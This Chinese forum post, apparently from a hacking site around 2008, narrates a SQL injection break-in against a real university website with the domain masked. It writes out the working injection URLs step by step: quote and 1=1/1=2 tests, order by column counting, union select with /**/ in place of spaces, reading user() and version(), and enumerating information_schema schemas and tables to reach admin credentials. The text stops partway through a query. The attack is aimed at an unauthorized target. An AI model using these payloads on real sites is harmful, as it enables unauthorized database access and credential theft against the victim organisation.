【渗透过程】...检测南方某大学
的页面都米有找到,呵呵呵,现在还米有太顺手的工具,麻烦啊!http://www.*****.edu.cn/****/*******/showarticle.php?id=**
呵呵!人品还不错啊!找了几个后碰到了一个,随手扔了个单引号,出现了不正常的页面,).[attach]360[/attach]
看来有戏啊!and 1=1正常,
(这里我直接用的/**/代替空格,有的过略了空格再回过来头改变麻烦,我之间用/**/)那么再来看看and 1=2,返回不正常了, 于是
我信心来了开始搞。开始猜下字段数目,order by 5正常 ,那么我再加点 order by 10,返回不正常出错了!那就说明在5-10之间
,从5开始一个一个的加,最后确定是8!
那么我们继续,我们就看下权限 和数据库都是什么,提交http://www.*****.edu.cn/*****/*****/showarticle.php?
id=**/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8/* 出现了2,4,5,6,7,8几个数字! 这时候我们可以替换来
查看信息!
我分别替换上user() database() version() system_user() , 这几个代表着: “用户名” “数据库名” “数据库版
本” “统用户名” 的意思!我们可以看出这个不是root权限,所以我们老老实实的猜解吧!
[img]http://www.t00ls.net/attachments/month_0811
/20081129_646b4f03a4e0f7c46480LHKOrXHog3pM.jpg[/img][url=http:
//www.t00ls.net
/attachment.php?aid=MzYxfDMyNTk4NjkwfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k%3D&
amp;nothumb=yes]链接标记下载[/url] (71.33 KB)
2008-11-29 07:05
猜解开始,我们来判断表名,我首先提交了http://www.*****.edu.cn/*****/*****/showarticle.php?
id=**/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8/**/from/**/admin/* 结果返回不正常,运气米有那么好,不
可能一步成功的!administratosr 不行,system_user也不行,这个我们需要按照经验,它是学校的所以根本不可能用那些企业的
manager boss等等,最后判断出来是user。!这时候我高高兴兴的去猜解字段,为什么我高兴呢!因为眼尖的朋友可以看到,下面
就有后台,现在只要字段出来,我们就完工了!嘎嘎!
理想是美好的,现实是残酷的!直接打开后台,查看源代码,猜测得出字段为username pwd 我回到前面继续,分别在2和7的位
置替换上这两个!但是出乎我的意料的是,返回不正常,也就说我猜测错误!这下可急死我了!怎么办呢?一时之间莫不着头绪!此
时已经晚上3点多了!睡觉去!明天再说
!
[img]http://www.t00ls.net/attachments/month_0811
/20081129_106819dd979a998e1cb56DGRNHfS65Ws.jpg[/img][url=http:
//www.t00ls.net
/attachment.php?aid=MzYyfDM0YjEyMmNhfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k%3D&
amp;nothumb=yes]链接标记下载[/url] (66.79 KB)
2008-11-29
07:05
[img]http://www.t00ls.net/attachments/month_0811
/20081129_9850d2941251af27a5f9kiBbGQW5fwXY.jpg[/img][url=http:
//www.t00ls.net
/attachment.php?aid=MzYzfGFlMThlN2JmfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k%3D&
amp;nothumb=yes]链接标记下载[/url] (108.98 KB)
2008-11-29 07:05
山穷水尽疑无路,柳暗花明又一村!第二天,晚上我又在这里徘徊,不停的找有用的信息!突然我看到了一丝曙光!那就是数据库
版本 5.0.18-nt!记得前两天我疯狂的找php的资料时候,看过一篇文章关于Mysql5注射的,里面介绍到我们只要通过注射点构造查
询语句遍相关字段,就可以得到我们想要的信息了!还好幸亏自己有点印象不然自己只能放弃了!
再回到开始,首先我们可以通过不断递增limit的第一个参数查询到所有的数据库名,语句为
http://www.*****.edu.cn/*****/*****/showarticle.php?
id=**/**/and/**/1=2/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8/**/from/**/information_schema.SCHEMATA/**/limit/
**/1,2/* 看到我们想看到的信息!找到敏感的数据名,我们把它转换为十六进制编码的,secure转换为16进制为0x 736563757265!
[img]http://www.t00ls.net/attachments/month_0811
/20081129_ebf8d8411ebdc258110dcto099kZINWu.jpg[/img][url=http:
//www.t00ls.net
/attachment.php?aid=MzY0fDNjMTFhMzcxfDEyODY0ODUzOTB8MWNiY3hHMHNnTjNEZzhUR3dmODNjaXNiQ3AwRjNtTllZeWFVdUozMWpNNy9uS0k%3D&
amp;nothumb=yes]链接标记下载[/url] (59.55 KB)
2008-11-29 07:05
接着第一步,我们把所有的表都列出来,[url=http://www.*****.edu.cn/*****/*****
/showarticle.php]链接标记http://www.*****.edu.cn/*****/*****
/showarticle.php[/url]?
id=**/**/and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8/**/from/**/information_schema.TABLES/**/where/**/
